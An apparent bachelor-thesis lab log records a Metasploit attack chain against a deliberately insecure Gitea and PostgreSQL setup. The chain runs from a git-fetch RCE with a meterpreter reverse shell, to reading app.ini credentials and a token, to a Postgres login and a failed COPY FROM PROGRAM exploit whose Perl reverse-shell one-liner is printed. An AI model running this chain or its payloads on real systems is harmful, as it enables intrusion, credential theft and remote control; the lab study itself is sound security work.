nanopenguin/bachelor-thesis
Archived
1
0
Fork 0
Code Actions
This repository has been archived on 2025-09-29. You can view files and clone it, but cannot push or open issues or pull requests.
bachelor-thesis/attack_notes_insecure.md
Benedikt Galbavy a14b7dc0df asdfgh
2025-05-20 00:43:52 +02:00

244 lines
8.6 KiB
Markdown
Raw Blame History

manually create account in gitea (demo_user:demo_user)
assuming ALLOW_LOCALNETWORKS is enabled (scenario: same network originally had a different git server, thus migration is now desired)
```sh
msf6 > use exploit/multi/http/gitea_git_fetch_rce
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/gitea_git_fetch_rce) > set LHOST 192.168.56.20
LHOST => 192.168.56.20
msf6 exploit(multi/http/gitea_git_fetch_rce) > set RHOSTS 192.168.56.10
RHOSTS => 192.168.56.10
msf6 exploit(multi/http/gitea_git_fetch_rce) > set RPORT 3000
RPORT => 3000
msf6 exploit(multi/http/gitea_git_fetch_rce) > set SSL false
SSL => false
msf6 exploit(multi/http/gitea_git_fetch_rce) > set username demo_user
username => demo_user
msf6 exploit(multi/http/gitea_git_fetch_rce) > set password demo_user
password => demo_user
msf6 exploit(multi/http/gitea_git_fetch_rce) > run
[*] Started reverse TCP handler on 192.168.56.20:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: 1.16.6
[*] Using URL: http://192.168.56.20:8080/
[*] Using URL: http://192.168.56.20:8080/6usOy2
[*] Client 192.168.56.10 (curl/7.79.1) requested /6usOy2
[*] Sending payload to 192.168.56.10 (curl/7.79.1)
[*] Sending stage (3045380 bytes) to 192.168.56.10
[*] Meterpreter session 1 opened (192.168.56.20:4444 -> 192.168.56.10:48350) at 2025-05-19 07:35:34 -0400
[*] Command Stager progress - 100.00% done (112/112 bytes)
meterpreter > sysinfo
Computer : 172.18.0.2
OS : (Linux 5.15.0-135-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
```
shell commands have been prefixed with a `>` for readability, this symbol is not present in the original
```sh
meterpreter > shell
Process 172 created.
Channel 1 created.
> env
USER=git
SHLVL=1
HOME=/data/git
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/system/bin:/system/sbin:/system/xbin
LANG=C
PWD=/data/git/repositories/demo_user/wssbr3glpme5a.git
> ls /data
git
gitea
ssh
> ls /data/gitea
attachments
avatars
conf
indexers
jwt
log
queues
repo-archive
repo-avatars
> ls /data/gitea/conf
app.ini
> cat /data/gitea/conf/app.ini
APP_NAME = Gitea: Git with a cup of tea
RUN_MODE = prod
[repository]
ROOT = /data/git/repositories
[repository.local]
LOCAL_COPY_PATH = /data/gitea/tmp/local-repo
[repository.upload]
TEMP_PATH = /data/gitea/uploads
[server]
APP_DATA_PATH = /data/gitea
DOMAIN = localhost
SSH_DOMAIN = localhost
HTTP_PORT = 3000
ROOT_URL = https://gitea.vm.local/
DISABLE_SSH = false
SSH_PORT = 22
SSH_LISTEN_PORT = 22
LFS_START_SERVER = false
LFS_CONTENT_PATH = /data/git/lfs
[database]
PATH = /data/gitea/gitea.db
DB_TYPE = postgres
HOST = postgres:5432
NAME = gitea
USER = gitea
PASSWD = gitea
LOG_SQL = false
...
[log]
MODE = console
LEVEL = info
ROUTER = console
ROOT_PATH = /data/gitea/log
[security]
INSTALL_LOCK = true
SECRET_KEY =
REVERSE_PROXY_LIMIT = 1
REVERSE_PROXY_TRUSTED_PROXIES = *
INTERNAL_TOKEN = eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYmYiOjE3NDc2NTQxMTB9.qXWoxugJwfYRPl1mm8pQ_Z1dreWr2A2I4Aol5edV8o4
[service]
DISABLE_REGISTRATION = false
REQUIRE_SIGNIN_VIEW = false
[migrations]
ALLOW_LOCALNETWORKS = true
```
for demonstration purposes,
database setup
```sh
meterpreter > resolve postgres
Host resolutions
================
Hostname IP Address
-------- ----------
postgres 172.18.0.1
meterpreter > portfwd add -l 5432 -p 5432 -r 172.18.0.1
[*] Forward TCP relay created: (local) :5432 -> (remote) 172.18.0.1:5432
meterpreter > background
[*] Backgrounding session 1...
msf6 > use auxiliary/scanner/postgres/postgres_login
[*] New in Metasploit 6.4 - The CreateSession option within this module can open an interactive session
msf6 auxiliary(scanner/postgres/postgres_login) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 auxiliary(scanner/postgres/postgres_login) > set USERNAME gitea
USERNAME => gitea
msf6 auxiliary(scanner/postgres/postgres_login) > set PASSWORD gitea
PASSWORD => gitea
msf6 auxiliary(scanner/postgres/postgres_login) > set DATABASE gitea
DATABASE => gitea
msf6 auxiliary(scanner/postgres/postgres_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf6 auxiliary(scanner/postgres/postgres_login) > run
[!] No active DB -- Credential data will not be saved!
[+] 127.0.0.1:5432 - Login Successful: gitea:gitea@gitea
[*] PostgreSQL session 2 opened (127.0.0.1:45027 -> 127.0.0.1:5432) at 2025-05-19 07:55:46 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Bruteforce completed, 1 credential was successful.
[*] 1 Postgres session was opened successfully.
[*] Auxiliary module execution completed
```
```sh
msf6 > use auxiliary/scanner/postgres/postgres_version
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 auxiliary(scanner/postgres/postgres_version) > set SESSION 2
SESSION => 2
msf6 auxiliary(scanner/postgres/postgres_version) > run
[*] 127.0.0.1:5432 Postgres - Version PostgreSQL 9.6.24 on x86_64-pc-linux-gnu (Ubuntu 9.6.24-10.pgdg22.04+1), compiled by gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0, 64-bit (Post-Auth)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
```sh
msf6 > use exploit/multi/postgres/postgres_copy_from_program_cmd_exec
[*] Using configured payload cmd/unix/reverse_perl
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set SESSION 2
SESSION => 2
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set LHOST 192.168.56.20
LHOST => 192.168.56.20msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > run
[*] Started reverse TCP handler on 192.168.56.20:4444
[*] : - PostgreSQL 9.6.24 on x86_64-pc-linux-gnu (Ubuntu 9.6.24-10.pgdg22.04+1), compiled by gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0, 64-bit
[*] Exploiting...
[+] 127.0.0.1:5432 - gqBG2W1VfJT dropped successfully
[+] 127.0.0.1:5432 - gqBG2W1VfJT created successfully
[!] 127.0.0.1:5432 - Unable to execute query: COPY "gqBG2W1VfJT" FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.56.20:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};''';
[-] Insufficient permissions, User must be superuser or in pg_read_server_files group
[-] Exploit Failed
```
most explots require superuser unfortunately, as shown
```sh
msf6 > use auxiliary/admin/postgres/postgres_sql
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 auxiliary(admin/postgres/postgres_sql) > set SESSION 2
SESSION => 2
msf6 auxiliary(admin/postgres/postgres_sql) > set SQL 'SELECT version();'
SQL => SELECT version();
msf6 auxiliary(admin/postgres/postgres_sql) > run
Query Text: 'SELECT version();'
===============================
version
-------
PostgreSQL 9.6.24 on x86_64-pc-linux-gnu (Ubuntu 9.6.24-10.pgdg22.04+1), compiled by gcc (U
buntu 11.4.0-1ubuntu1~22.04) 11.4.0, 64-bit
[*] Auxiliary module execution completed
msf6 auxiliary(admin/postgres/postgres_sql) > set SQL "SELECT column_name, data_type FROM information_schema.columns WHERE table_schema = 'public' AND table_name = 'user';"
SQL => SELECT column_name, data_type FROM information_schema.columns WHERE table_schema = 'public' AND table_name = 'user';
msf6 auxiliary(admin/postgres/postgres_sql) > run
Query Text: 'SELECT column_name, data_type FROM information_schema.columns WHERE table_schema = 'public' AND table_name = 'user';'
==================================================================================================================================
column_name data_type
----------- ---------
allow_create_organization boolean
allow_git_hook boolean
allow_import_local boolean
avatar character varying
...
login_name character varying
login_source bigint
login_type integer
...
passwd character varying
passwd_hash_algo character varying
...
salt character varying
...
[*] Auxiliary module execution completed
```
log:insecure:nmap
log:insecure:gitea_rce
log:insecure:gitea:shell
log:insecure:postgres_session
log:insecure:postgres_exploit_version
log:insecure:postgres_exploit_rce
log:insecure:postgres_exploit_sql
View Git Blame Copy Permalink